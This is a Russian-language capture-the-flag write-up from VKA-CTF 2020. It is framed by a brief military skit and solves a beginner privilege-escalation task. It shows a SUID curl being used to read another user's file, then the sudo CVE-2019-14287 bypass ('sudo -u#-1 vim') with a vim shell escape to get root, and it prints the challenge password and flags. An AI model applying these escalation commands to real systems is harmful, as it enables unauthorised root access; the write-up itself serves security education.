| Событие | Название | Категория | Сложность |
|---|---|---|---|
| VKA-CTF`2020 | К месту службы прибыл | HTB | АБИТУРА/1-3 курс |
Автор: [ 𝕂𝕣𝕒𝕦𝕤𝕖 ]
- Товарищ полковник, лейтенант Байконуров для дальнейшего прохождения воинской службы...
- Да, да, заходи скорее, вот твое рабочее место, вот твое имущество, компьютер, монитор, генеральский сервер... Вот готовый акт о приеме, ставь тут подпись, не мешкай.
- Нет, нет, извините, в академии меня целых пять лет учили как заправлять ракету, жать на кнопку и правильно принимать обязанности при заступлении на новую должность. Дайте ка мне все проверить.
пароль: vZNdVJij7UTQ8zEt
У утилиты cURL установлен SUID bit, а владелцем данного файла является super-server. Используем это, чтобы читать файлы этого пользователя.
> curl file:///home/super-server/user.txt
vka{wh47_15_5u1d_b17Флаг:
vka{wh47_15_5u1d_b17}
Посмотрим на команды, которые мы может выполнить от имени суперпользователя
$ sudo -l
User reborn may run the following commands on host:
(ALL, !root) NOPASSWD: /usr/bin/vimДанная настройка конфигурации является уязвимой для выполнения указанной команды от имени суперпользователя, если установлен SUDO версией меньшей, чем 1.8.28 CVE-2019-14287
$ sudo -u#-1 vimДалее необходимо получить shell. На сайте gtfobins указано, как это сделать
:set shell=/bin/bash
:shell
Получаем shell с правами суперпользователя и читаем флаг
$ id
uid=0(root) gid=1001(reborn) groups=1001(reborn)Флаг:
vka{n3v3r_f0r637_CV3}